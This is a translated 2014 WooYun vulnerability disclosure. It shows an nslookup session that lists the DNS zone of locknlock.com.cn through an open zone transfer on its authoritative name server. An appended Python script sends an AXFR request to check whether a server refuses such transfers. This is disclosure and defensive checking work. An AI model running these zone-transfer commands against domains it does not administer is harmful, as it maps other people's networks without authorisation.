Vulnerability summary
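Vulnerability details
Disclosure status:
2014-11-07: Actively contacting the vendor and waiting for the vendor to claim the report; details are not public
2014-12-22: The vendor has actively ignored the vulnerability; details are disclosed to the public
Brief description: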
...
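It looks like this afternoon's delivery was theirs; a quick Baidu search shows they are quite impressive.
Detailed description:
乐扣乐扣 (Lock&Lock)
Part of a continuing series~
DNS domain resolution vulnerability (the authoritative name server allows a zone listing)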
C:\Users\Administrator>nslookup
默认服务器: google-public-dns-a.google.com
Address: 8.8.8.8
> set type=ns
> locknlock.com.cn
服务器: google-public-dns-a.google.com
Address: 8.8.8.8
非权威应答:
locknlock.com.cn nameserver = dns.stn.sh.cn
locknlock.com.cn nameserver = sns.stn.sh.cn
> server dns.stn.sh.cn
默认服务器: dns.stn.sh.cn
Address: 203.95.1.1
> ls locknlock.com.cn
[dns.stn.sh.cn]
locknlock.com.cn. A 210.14.70.17
locknlock.com.cn. NS server = dns.stn.sh.cn
locknlock.com.cn. NS server = sns.stn.sh.cn
>
ok
Proof of vulnerability:
As above
Fix:
Fix it~
Copyright notice: when reposting, please credit the source 爱上平顶山@乌云 (WooYun)
Vulnerability response
Vendor response:
The vendor could not be reached, or the vendor actively declined
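
An added example, not part of the original report: a Python check that an administrator can run against the name servers of a zone they operate, to confirm that the zone transfer (AXFR) request issued by the `ls` command in the session above is refused once the server is fixed. The function names, verdict strings and sample headers are constructed for illustration; the check reports only the verdict and never prints zone records.

```python
import socket
import struct

QTYPE_AXFR, QCLASS_IN = 252, 1
RCODES = {0: "NOERROR", 2: "SERVFAIL", 5: "REFUSED", 9: "NOTAUTH"}

def build_axfr_query(zone, txid=0x1234):
    """Return a TCP-framed DNS query asking for a full zone transfer (AXFR)."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)  # flags=0: standard query
    labels = zone.rstrip(".").split(".")
    qname = b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"
    message = header + qname + struct.pack("!HH", QTYPE_AXFR, QCLASS_IN)
    return struct.pack("!H", len(message)) + message  # DNS over TCP length prefix

def classify_response(message):
    """Classify the first response message (without the TCP length prefix)."""
    if len(message) < 12:
        return "malformed"
    _txid, flags, _qd, ancount, _ns, _ar = struct.unpack("!HHHHHH", message[:12])
    rcode = flags & 0x000F
    if rcode == 0 and ancount > 0:
        return "TRANSFER ALLOWED"  # server started sending zone records
    return "no transfer (%s)" % RCODES.get(rcode, "rcode %d" % rcode)

def _recv_exact(sock, n):
    """Read up to n bytes, stopping early only if the peer closes."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            break
        buf += chunk
    return buf

def check_server(server, zone, timeout=5.0):
    """Ask `server` for an AXFR of `zone`; return only the verdict, not the records."""
    try:
        with socket.create_connection((server, 53), timeout=timeout) as sock:
            sock.sendall(build_axfr_query(zone))
            prefix = _recv_exact(sock, 2)
            if len(prefix) < 2:
                return "connection closed without an answer"
            return classify_response(_recv_exact(sock, struct.unpack("!H", prefix)[0]))
    except OSError as exc:
        return "no answer (%s)" % exc

# Constructed sample headers (not captured traffic): REFUSED, and NOERROR with one answer.
SAMPLE_REFUSED = struct.pack("!HHHHHH", 0x1234, 0x8005, 1, 0, 0, 0)
SAMPLE_ALLOWED = struct.pack("!HHHHHH", 0x1234, 0x8400, 1, 1, 0, 0)
```

Call `check_server(name_server, zone)` once for each NS record of the zone; every authoritative server should return a "no transfer" verdict to hosts that are not designated secondaries.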